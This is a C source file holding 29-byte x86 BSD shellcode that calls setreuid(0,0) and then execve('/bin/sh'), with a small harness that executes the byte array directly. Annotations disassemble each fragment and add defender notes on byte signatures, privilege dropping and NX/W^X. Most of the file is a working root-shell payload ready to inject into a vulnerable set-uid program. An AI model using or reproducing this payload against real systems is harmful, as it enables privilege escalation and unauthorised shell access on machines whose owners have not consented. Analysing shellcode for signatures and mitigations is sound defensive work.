/* 29 bytes setreuid(0,0) execve /bin/sh shellcode - BSD-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * Tested on: FreeBSD-4.3, OpenBSD-2.9, NetBSD-1.5
 *
 */


/*
 * Raw i386 machine code stored as a C string literal; the trailing comment on
 * each fragment is its disassembly.  The visible bytes add up to 29, and none
 * of them is 0x00, so strlen() in main() reports the full payload length.
 *
 * Per the file header the sequence issues two system calls through int 80h:
 * one described as setreuid(0,0), followed by execve of /bin/sh.
 *
 * Notes for analysts and defenders:
 *  - The two push-immediate fragments carry the bytes "//sh" and "/bin" in the
 *    clear and both system calls end in cd 80, so the blob is straightforward
 *    to match with a byte signature.
 *  - setreuid(0,0) generally succeeds only in a process that is already
 *    privileged (for example a set-uid root program), so permanently dropping
 *    privileges before handling untrusted input limits what this can regain.
 *  - NOTE(review): the page shows no syscall table; confirm that 202 really is
 *    the setreuid number on the systems listed in the header.
 */
char code[] =

   "\x31\xc0"			// xor	eax, eax   ; eax = 0
   "\x50"			// push	eax        ; three zero dwords: presumably the two
   "\x50"			// push	eax        ; arguments plus the extra stack slot the
   "\x50"			// push	eax        ; BSD int 80h convention expects -- confirm
   "\xb0\xca"			// mov	al, 202    ; syscall number (header: setreuid)
   "\xcd\x80"			// int	80h        ; first system call
   "\x68\x2f\x2f\x73\x68"	// push    dword 68732f2fh ; bytes "//sh"
   "\x68\x2f\x62\x69\x6e"	// push    dword 6e69622fh ; bytes "/bin" -> "/bin//sh" on the stack
   "\x89\xe3"			// mov     ebx, esp ; ebx = address of the path string
   "\x50"			// push    eax      ; assumes eax is still 0 after the first call
   "\x54"			// push    esp      ; address of the slot just pushed
   "\x53"			// push    ebx      ; path address
   "\x53"			// push    ebx      ; path address again (likely the extra slot)
   "\xb0\x3b"			// mov     al, 59   ; syscall number (header: execve)
   "\xcd\x80";			// int     80h      ; second system call


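/* Declared here because the file has no include block of its own. */
#include <stdio.h>   /* printf */
#include <string.h>  /* strlen */

/*
 * Test harness: prints the payload length, then calls the byte array as if it
 * were a function.
 *
 * The array lives in the program's data segment.  Systems that enforce
 * non-executable data (NX / W^X) are expected to fault on the call instead of
 * running the bytes; that mitigation is what stops this class of payload.
 * Run it only inside an isolated analysis environment.
 *
 * Returns 0 if control ever comes back from the call.
 */
int main(void) {
  /* Object-to-function pointer conversion: a compiler extension, not ISO C. */
  void (*a)(void) = (void (*)(void))code;

  /* strlen() yields size_t, so the matching conversion is %zu, not %d. */
  printf("size: %zu bytes\n", strlen(code));
  a();
  return 0;
}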

